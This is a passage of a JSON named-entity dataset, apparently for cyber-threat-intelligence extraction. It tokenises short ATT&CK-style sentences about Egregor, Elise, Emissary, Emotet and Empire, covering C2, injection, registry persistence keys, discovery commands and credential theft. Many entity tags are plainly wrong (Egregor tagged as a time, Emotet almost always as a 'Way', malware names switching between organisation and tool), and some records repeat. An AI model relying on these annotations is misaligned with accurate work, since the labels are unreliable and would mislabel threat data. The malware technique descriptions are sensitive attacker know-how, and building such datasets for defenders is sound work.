"O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "communicated", "with", "its", "C2", "servers", "via", "HTTPS", "protocol." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Egregor", "has", "used", "batch", "files", "for", "execution", "and", "can", "launch", "Internet", "Explorer", "from", "cmd.exe." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "Elise", "injects", "DLL", "files", "into", "iexplore.exe." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-SamFile" ] }, { "tokens": [ "Elise", "encrypts", "several", "of", "its", "files,", "including", "configuration", "files." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Elise", "is", "capable", "of", "launching", "a", "remote", "shell", "on", "the", "host", "to", "delete", "itself." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "variant", "of", "Elise", "executes", "<code>dir", "C:\\progra~1</code>", "when", "initially", "run." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "can", "download", "additional", "files", "from", "the", "C2", "server", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "executes", "<code>net", "user</code>", "after", "initial", "communication", "is", "made", "to", "the", "remote", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "creates", "a", "file", "in", "<code>AppData\\Local\\Microsoft\\Windows\\Explorer</code>", "and", "stores", "all", "harvested", "data", "in", "that", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "installing", "itself", "as", "a", "service", "fails,", "Elise", "instead", "writes", "itself", "as", "a", "file", "named", "svchost.exe", "saved", "in", "%APPDATA%\\Microsoft\\Network." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Elise", "enumerates", "processes", "via", "the", "<code>tasklist</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "establishing", "persistence", "by", "installation", "as", "a", "new", "service", "fails,", "one", "variant", "of", "Elise", "establishes", "persistence", "for", "the", "created", ".exe", "file", "by", "setting", "the", "following", "Registry", "key:", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost", ":", "%APPDATA%\\Microsoft\\Network\\svchost.exe</code>.", "Other", "variants", "have", "set", "the", "following", "Registry", "keys", "for", "persistence:", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\imejp", ":", "[self]</code>", "and", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\IAStorD</code>." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "After", "copying", "itself", "to", "a", "DLL", "file,", "a", "variant", "of", "Elise", "calls", "the", "DLL", "file", "using", "rundll32.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "I-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Elise", "exfiltrates", "data", "using", "cookie", "values", "that", "are", "Base64-encoded." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "encrypts", "exfiltrated", "data", "with", "RC4." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "executes", "<code>systeminfo</code>", "after", "initial", "communication", "is", "made", "to", "the", "remote", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "executes", "<code>ipconfig", "/all</code>", "after", "initial", "communication", "is", "made", "to", "the", "remote", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "executes", "<code>net", "start</code>", "after", "initial", "communication", "is", "made", "to", "the", "remote", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elise", "performs", "timestomping", "of", "a", "CAB", "file", "it", "creates." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Elise", "communicates", "over", "HTTP", "or", "HTTPS", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Elise", "configures", "itself", "as", "a", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "variant", "of", "Emissary", "appends", "junk", "data", "to", "the", "end", "of", "its", "DLL", "file", "to", "create", "a", "large", "file", "that", "may", "exceed", "the", "maximum", "size", "that", "anti-virus", "programs", "can", "scan." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emissary", "injects", "its", "DLL", "file", "into", "a", "newly", "spawned", "Internet", "Explorer", "process." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Variants", "of", "Emissary", "encrypt", "payloads", "using", "various", "XOR", "ciphers,", "as", "well", "as", "a", "custom", "algorithm", "that", "uses", "the", "\"srand\"", "and", "\"rand\"", "functions." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Emissary", "has", "the", "capability", "to", "execute", "<code>gpresult</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "B-Features" ] }, { "tokens": [ "Emissary", "has", "the", "capability", "to", "download", "files", "from", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Emissary", "has", "the", "capability", "to", "execute", "the", "command", "<code>net", "localgroup", "administrators</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Variants", "of", "Emissary", "have", "added", "Run", "Registry", "keys", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Variants", "of", "Emissary", "have", "used", "rundll32.exe", "in", "Registry", "values", "added", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "C2", "server", "response", "to", "a", "beacon", "sent", "by", "a", "variant", "of", "Emissary", "contains", "a", "36-character", "GUID", "value", "that", "is", "used", "as", "an", "encryption", "key", "for", "subsequent", "network", "communications.", "Some", "variants", "of", "Emissary", "use", "various", "XOR", "operations", "to", "encrypt", "C2", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Emissary", "has", "the", "capability", "to", "execute", "ver", "and", "systeminfo", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emissary", "has", "the", "capability", "to", "execute", "the", "command", "<code>ipconfig", "/all</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emissary", "has", "the", "capability", "to", "execute", "the", "command", "<code>net", "start</code>", "to", "interact", "with", "services." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Emissary", "uses", "HTTP", "or", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Emissary", "has", "the", "capability", "to", "create", "a", "remote", "shell", "and", "execute", "specified", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Emissary", "is", "capable", "of", "configuring", "itself", "as", "a", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "encrypting", "the", "data", "it", "collects", "before", "sending", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "is", "known", "to", "use", "RSA", "keys", "for", "encrypting", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "obfuscated", "macros", "within", "malicious", "documents", "to", "hide", "the", "URLs", "hosting", "the", "malware,", "CMD.exe", "arguments,", "and", "PowerShell", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "leveraging", "a", "module", "that", "retrieves", "passwords", "stored", "on", "a", "system", "for", "the", "current", "logged-on", "user." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "dropping", "browser", "password", "grabber", "modules." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "used", "a", "self-extracting", "RAR", "file", "to", "deliver", "modules", "to", "victims.", "Emotet", "has", "also", "extracted", "embedded", "executables", "from", "files", "using", "hard-coded", "buffer", "offsets." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "injecting", "in", "to", "Explorer.exe", "and", "other", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "leveraging", "a", "module", "that", "can", "scrape", "email", "addresses", "from", "Outlook." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "leveraging", "a", "module", "that", "can", "scrape", "email", "addresses", "from", "Outlook." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Emotet", "has", "dropped", "an", "embedded", "executable", "at", "`%Temp%\\setup.exe`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "exfiltrated", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "seen", "exploiting", "SMB", "via", "a", "vulnerability", "exploit", "like", "EternalBlue", "(MS17-010)", "to", "achieve", "lateral", "movement", "and", "propagation." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Features", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "dropping", "password", "grabber", "modules", "including", "Mimikatz." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Emotet", "has", "copied", "itself", "to", "remote", "systems", "using", "the", "`service.exe`", "filename." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Emotet", "can", "brute", "force", "a", "local", "admin", "password,", "then", "use", "it", "to", "facilitate", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "leveraging", "a", "module", "that", "scrapes", "email", "data", "from", "Outlook." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "attachment", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Emotet", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "link", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Emotet", "has", "installed", "itself", "as", "a", "new", "service", "with", "the", "service", "name", "`Windows", "Defender", "System", "Service`", "and", "display", "name", "`WinDefService`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "used", "`CreateProcess`", "to", "create", "a", "new", "process", "to", "run", "its", "executable", "and", "`WNetEnumResourceW`", "to", "enumerate", "non-hidden", "shares." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "enumerated", "non-hidden", "network", "shares", "using", "`WNetEnumResourceW`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "to", "hook", "network", "APIs", "to", "monitor", "network", "traffic." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Emotet", "has", "used", "HTTP", "over", "ports", "such", "as", "20,", "22,", "443,", "7080,", "and", "50000,", "in", "addition", "to", "using", "ports", "commonly", "associated", "with", "HTTP/S." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "using", "a", "hard", "coded", "list", "of", "passwords", "to", "brute", "force", "user", "accounts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Emotet", "has", "used", "Powershell", "to", "retrieve", "the", "malicious", "payload", "and", "download", "additional", "resources", "like", "Mimikatz." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "enumerating", "local", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "reflectively", "loaded", "payloads", "into", "memory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "adding", "the", "downloaded", "payload", "to", "the", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "key", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "leveraged", "the", "Admin$,", "C$,", "and", "IPC$", "shares", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "maintained", "persistence", "through", "a", "scheduled", "task." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "used", "custom", "packers", "to", "protect", "its", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "delivered", "by", "phishing", "emails", "containing", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O" ] }, { "tokens": [ "Emotet", "has", "been", "delivered", "by", "phishing", "emails", "containing", "links." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O" ] }, { "tokens": [ "Emotet", "has", "used", "Google’s", "Protobufs", "to", "serialize", "data", "sent", "to", "and", "from", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "enumerated", "all", "users", "connected", "to", "network", "shares." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "the", "ability", "to", "duplicate", "the", "user’s", "token." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "sent", "Microsoft", "Word", "documents", "with", "embedded", "macros", "that", "will", "invoke", "scripts", "to", "download", "additional", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Emotet", "has", "used", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "can", "extract", "names", "of", "all", "locally", "reachable", "Wi-Fi", "networks", "and", "then", "perform", "a", "brute-force", "attack", "to", "spread", "to", "new", "networks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Emotet", "has", "used", "cmd.exe", "to", "run", "a", "PowerShell", "script." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Emotet", "has", "used", "WMI", "to", "execute", "powershell.exe." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "Emotet", "has", "been", "observed", "creating", "new", "services", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "PowerSploit's", "<code>Invoke-TokenManipulation</code>", "to", "manipulate", "access", "tokens." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "leverage", "WMI", "debugging", "to", "remotely", "replace", "binaries", "like", "sethc.exe,", "Utilman.exe,", "and", "Magnify.exe", "with", "cmd.exe." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Empire", "can", "ZIP", "directories", "on", "the", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "TLS", "to", "encrypt", "its", "C2", "channel." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "automatically", "gather", "the", "username,", "domain", "name,", "machine", "name,", "and", "other", "information", "from", "a", "compromised", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "has", "the", "ability", "to", "automatically", "send", "collected", "data", "back", "to", "the", "threat", "actors'", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "Dropbox", "and", "GitHub", "for", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Empire", "has", "the", "ability", "to", "gather", "browser", "data", "such", "as", "bookmarks", "and", "visited", "sites." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "includes", "various", "modules", "to", "attempt", "to", "bypass", "UAC", "for", "escalation", "of", "privileges." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "harvest", "clipboard", "data", "on", "both", "Windows", "and", "macOS", "systems." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "has", "the", "ability", "to", "obfuscate", "commands", "using", "<code>Invoke-Obfuscation</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Empire", "uses", "a", "command-line", "interface", "to", "interact", "with", "systems." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "<code>Invoke-RunAs</code>", "to", "make", "tokens." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Empire", "contains", "some", "modules", "that", "leverage", "API", "hooking", "to", "carry", "out", "tasks,", "such", "as", "netripper." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Empire", "can", "use", "various", "modules", "to", "search", "for", "files", "containing", "passwords." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "modules", "that", "extract", "passwords", "from", "common", "web", "browsers", "such", "as", "Firefox", "and", "Chrome." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Empire", "contains", "modules", "that", "can", "discover", "and", "exploit", "various", "DLL", "hijacking", "opportunities." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "utilize", "<code>Invoke-DCOM</code>", "to", "leverage", "remote", "COM", "execution", "for", "lateral", "movement." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "acquire", "local", "and", "domain", "user", "account", "information." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "has", "a", "module", "for", "creating", "a", "new", "domain", "user", "if", "permissions", "allow." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Features", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Empire", "has", "modules", "for", "enumerating", "domain", "trusts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "has", "a", "dylib", "hijacker", "module", "that", "generates", "a", "malicious", "dylib", "given", "the", "path", "to", "a", "legitimate", "dylib", "of", "a", "vulnerable", "application." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "send", "data", "gathered", "from", "a", "target", "through", "the", "command", "and", "control", "channel." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "Dropbox", "for", "data", "exfiltration." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "Empire", "can", "use", "GitHub", "for", "data", "exfiltration." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "Empire", "can", "exploit", "vulnerabilities", "such", "as", "MS16-032", "and", "MS16-135." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Empire", "has", "a", "limited", "number", "of", "built-in", "modules", "for", "exploiting", "remote", "SMB,", "JBoss,", "and", "Jenkins", "servers." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "Empire", "includes", "various", "modules", "for", "finding", "files", "of", "interest", "on", "hosts", "and", "network", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "leverage", "its", "implementation", "of", "Mimikatz", "to", "obtain", "and", "use", "golden", "tickets." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "includes", "various", "modules", "for", "enumerating", "Group", "Policy." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "<code>New-GPOImmediateTask</code>", "to", "modify", "a", "GPO", "that", "will", "install", "and", "execute", "a", "malicious", "Scheduled", "Task/Job." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "upload", "and", "download", "to", "and", "from", "a", "victim", "machine." ], "ner_tags": [ "B-HackOrg", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "uses", "PowerSploit's", "<code>Invoke-Kerberoast</code>", "to", "request", "service", "tickets", "and", "return", "crackable", "ticket", "hashes." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "includes", "keylogging", "capabilities", "for", "Windows,", "Linux,", "and", "macOS", "systems." ], "ner_tags": [ "B-SamFile", "O", "B-Tool", "B-Features", "O", "O", "B-Idus", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "Inveigh", "to", "conduct", "name", "service", "poisoning", "for", "credential", "theft", "and", "associated", "relay", "attacks." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "I-Way", "I-Way", "I-Way", "O", "B-SamFile", "B-Purp", "O", "O", "I-OffAct", "O" ] }, { "tokens": [ "Empire", "contains", "an", "implementation", "of", "Mimikatz", "to", "gather", "credentials", "from", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "Empire", "can", "acquire", "local", "and", "domain", "user", "account", "information." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "has", "a", "module", "for", "creating", "a", "local", "user", "if", "permissions", "allow." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Features", "B-Purp", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Empire", "has", "the", "ability", "to", "collect", "emails", "on", "a", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "built-in", "modules", "to", "abuse", "trusted", "utilities", "like", "MSBuild.exe." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Empire", "contains", "a", "variety", "of", "enumeration", "modules", "that", "have", "an", "option", "to", "use", "API", "calls", "to", "carry", "out", "tasks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "perform", "port", "scans", "from", "an", "infected", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", 